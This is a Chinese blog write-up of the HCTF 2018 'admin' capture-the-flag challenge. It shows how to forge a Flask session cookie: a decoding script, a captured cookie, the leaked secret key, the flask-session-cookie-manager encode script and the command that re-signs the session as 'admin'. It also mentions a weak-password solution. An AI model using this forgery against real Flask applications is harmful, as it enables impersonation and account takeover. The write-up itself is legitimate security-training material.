[HCTF 2018]admin之Flask之session伪造

最新推荐文章于 2024-05-29 17:01:36 发布
最新推荐文章于 2024-05-29 17:01:36 发布
阅读量2.9k 收藏 2
点赞数
分类专栏: CTF题目笔记 文章标签: flask web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/124338506
版权

接解法一

解法二:Flask之session伪造

原理

首先要明确cookie和session的区别:cookie放在客户端,我们可以获得的。session放在服务器,我们无法拿到的,但是flask这种轻量级的框架,session就放在了客户端,因此我们能拿来修改,这就是我们能session伪造的原因。session加密了,可以用解密脚本来解密。我们将一般用户的session修改为admin的session,再用加密脚本加上秘钥来加密成admin的session就OK了。

过程

1、参考文章
Flask之session伪造(从某平台学习Session身份伪造)

2、找session
在这里插入图片描述3、解密脚本,我在编译器运行的。

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')
                            
    return session_json_serializer.loads(payload)

if __name__ == '__main__':
	# 放置session
    print(decryption(".eJxFkE-LwkAMxb_KkrOHdqwXwYv0DxUypTIyJBdxtTodjQtV2bbid99Blt3k8sh7_ODlCdtj19wczO_do5nAtj3A_AkfnzAH8pjQiJE254HNeVrZWgXda6GBPcYk9YjpacqpvrBsVMhO2S8FpVbo121lKdKWHY1LV5mD0Kjbyqw8KnZosxnbOqqKXNhmCUk56KLu2Qc9Zj0WOHCRuyotY60oZiGF6UGw0IGvHZpNz0X5zSYX8rSA1wT2t-64vX-dm-t_BZOFyH5AgxEJh6UEVaj1xrmLltzrMRedlgnZtcN0feHT4o1rZXdq_kgmX7H9da47CQbEYWACj1vTvd8WDvD6AQkBa-c.YmIMmA.vkGdxjLQqP1iKcggIjNESkzPtVE".encode()))

4、运行结果,我注册的账号的为1111。

{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': '1111', 'user_id': '10'}

5、到config文件找秘钥
在这里插入图片描述6、加密脚本
GITHUB给你爱

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key

if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

7、新建加密脚本为flask_session.py文件,秘钥为ckj123,用下面代码运行。

python flask_session.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': 'admin', 'user_id': '10'}
"

8、运行成功
在这里插入图片描述9、将session放回原位,刷新即可得到flag。
在这里插入图片描述

解法三:弱口令

管他黑猫白猫,能抓到老鼠的就是好猫。
在这里插入图片描述

c4fx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flaskflask-session的具体使用
09-20
主要介绍了Flaskflask-session的具体使用,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PythonWEB框架之Flask
01-27
(ORM、Session、Form、Admin、分页、中间件、信号、缓存、ContenType....);Tornado:2大特性就是异步非阻塞、原生支持WebSocket协议;Flask:封装功能不及Django完善,性能不及Tornado,但是Flask的第三方开源组件...
NJUPTCTF-2018出题心得
郁离歌丶的博客
01-21 4416
NJUPTCTF-2018出题心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人解出,但是还是有很多人要我写...
web SSTI 刷题记录
rev1ve的博客
08-26 550
SSTI模板注入 刷题记录 [CISCN 2019华东南]Web11,[HDCTF 2023]SearchMaster,[HNCTF 2022 WEEK2]ez_SSTI
session,PIN码伪造学习(py flask)
oyf3085227433的博客
03-12 1134
学习一下伪造session,PIN码的知识
【Web】Flask|Jinja2 SSTI
uuzeray的博客
11-20 711
dirsearch扫出/secret明示get传一个secret?secret={{7*7}}直接报错告诉我们是flask点开看看rc4加密?密钥为HereIsTreasure贴一段脚本先最终payload:/secret?
解:[NCTF 2018]flask真香--TLS_预备队任务(1)
river_mouth_man的博客
03-09 596
ssti
flask利用session身份伪造
weixin_30872867的博客
01-09 812
想研究很久了,这次终于初步了解了flask session伪造(得知道密钥)。 python2和python3 session解密不一样,而且不都是base64,脚本https://github.com/ZhangAiQiang/Flask/tree/master/%E8%A7%A3%E5%AF%86session%E8%84%9A%E6%9C%AC 参考文章:https://www.cnblog...
HCTF 2018admin ——flask session伪造unicode伪造
4pri1
02-10 318
[HCTF 2018]admin ——flask session伪造||unicode伪造 猜测要么从url栏,要么从注册登录部分注入 猜admin的密码 123,对了本题结束。 如果按照完整解这个题 查看源代码,发现新提示 其余没有提示,先注册账号并登录 更新了新的change password 和post页面 在change password发现新提示 注册从bp抓包入手 admin不能注册 但是发现报文里有session所以不
flask session伪造hctf admin
qq_58970968的博客
07-04 510
知识点:flasksession是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的。还有些session是存储在数据库中或者服务器的文件里。关于只有admin才能读取flag 的题目,我们可以通过伪造session来达到身份伪造;步骤如下:得有伪造代码:下载地址:https://github.com/noraj/flask-session-cookie-
CTF [HCTF 2018]admin writeup Flask-session unicode
baynk的博客
04-02 1621
虽然弄出来的,但是感觉不是预期解,所以直接去看的wirteup,之前没弄过python框架的站,学习复现一波,学习之路途漫长。。。 0x01 瞎弄 一打开就看到这个,可能是爆破的,因为名字都告诉你了,但是还点了几下,发现有登陆和注册功能。 在登陆处,尝试了下万能密码啥的,除了括号也不能用起来的特殊字符,不然就直接返回错误 然后看到了注册页,第一次反应莫不是二次注入?注入学疯了,然后注册了个...
[HCTF 2018]admin
m0_56691564的博客
11-30 1022
flasksession是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,将session存储在cookie中,这就可能造成一些安全问题。这是这个题的源代码因此下载下来看一看,看 网上大佬说的用pycharm或其他打开,审计代码,先看路由(route),每一个.py文件一个一个审计。而通过对flask的了解,我们可以得知,在知道secret_key的情况下,我们可以对签名进行伪造
Flask之旅游
10-01
Flask之旅,Flask学习的精品,文档清晰,带目录,可在Kindle,掌阅等阅读器上阅读
基于python flask的疾病数据采集与可视化大屏,实现关联规则算法的治疗方法分析
weixin_49081159的博客
05-28 644
基于Python Flask的疾病数据采集与可视化大屏,旨在实现对疾病数据的采集、分析和可视化展示,为医疗领域提供决策支持和治疗方法分析。其中,关联规则算法被应用于治疗方法分析,旨在发现不同治疗方式之间的关联性和规律性,从而为医疗决策提供依据。通过大屏可视化展示,医疗从业者可以直观了解不同治疗方法之间的相关性,探索潜在的治疗方案组合,优化治疗流程,提高医疗效率和疗效。这项研究背景旨在结合数据采集、关联规则算法和可视化技术,为医疗决策提供更科学、数据驱动的支持,推动医疗信息化与智能化发展。
Python flask怎么连接MySQL?
最新发布
琳琳的博客
05-29 449
使用Django ORM时,你需要遵循Django的项目和应用结构,并在应用的`models.py`文件中定义模型。在Python中连接MySQL并使用模型创建新的表,通常我们会使用ORM(对象关系映射)库,比如SQLAlchemy或者Django ORM,它们允许我们定义Python类来映射到数据库中的表,并通过这些类进行数据库操作。请确保将`username`、`password`、`localhost`、`3306`和`dbname`替换为你自己的MySQL数据库的实际凭证和设置。
Flask教程5:flask数据库SQLAlchemy
Cachel Wood的博客
05-27 393
它的核心思想于在于将关系数据库表中的记录映射成为对象,以对象的形式展现,程序员可以把对数据库的操作转化为对对象的操作。,我们可能会写特别多的数据访问层的代码,从数据库保存、删除、读取对象信息,但这些代码都是重复的。当需要实现一个应用程序时,如果不使用。则能够大大减少重复性的代码。
基于python flask +pyecharts实现的气象数据可视化分析大屏
weixin_49081159的博客
05-28 539
气象数据可视化分析大屏基于Python Flask和Pyecharts技术,旨在通过图表展示气象数据的分析结果,提供直观的数据展示和分析功能。在当今信息化时代,气象数据的准确性和实时性对各行业具有重要意义。通过搭建气象数据可视化分析大屏,用户可以实时监测和分析气象数据趋势,帮助决策者制定有效的应对措施。该系统将为气象领域的研究人员、气象服务机构和相关行业提供强大的数据分析和决策支持,推动气象信息化应用的发展和提升。
SQLServer2022 ISJSON新特性增强json_type_constraint参数
zxrhhm的博客
05-28 620
SQLServer2022 ISJSON新特性增强json_type_constraint参数,检查 JSON 类型
flask怎么创建session会话
03-31
Flask中创建session会话可以使用内置的`session`对象,具体步骤如下: 1. 在Flask应用中引入`session`对象: ```python from flask import Flask, session ``` 2. Flask默认使用Cookie存储session,需要设置一个密钥来加密Cookie。 ```python app = Flask(__name__) app.secret_key = 'your_secret_key' ``` 3. 在需要创建session的地方,可以使用`session`对象来存储数据。例如: ```python @app.route('/login', methods=['GET', 'POST']) def login(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] # 验证用户名和密码 if username == 'admin' and password == '123456': session['username'] = username return redirect(url_for('index')) else: flash('用户名或密码错误!') return render_template('login.html') ``` 在上面的例子中,如果用户名和密码验证通过,就将用户名存储到session中。 4. 在其他页面可以通过`session`对象来获取存储在session中的数据。例如: ```python @app.route('/') def index(): if 'username' in session: username = session['username'] return 'Hello, %s!' % username else: return redirect(url_for('login')) ``` 在上面的例子中,如果session中存在用户名,则显示欢迎信息,否则跳转到登录页面。 注意:在使用session之前,需要安装`flask-session`扩展,可以使用以下命令安装: ``` pip install flask-session ``` 然后在应用中引入`Session`对象: ```python from flask_session import Session app = Flask(__name__) app.config['SESSION_TYPE'] = 'filesystem' Session(app) ``` 在上面的例子中使用了文件系统来存储session,当然也可以使用其他方式,例如Redis等。具体请参考`flask-session`的文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值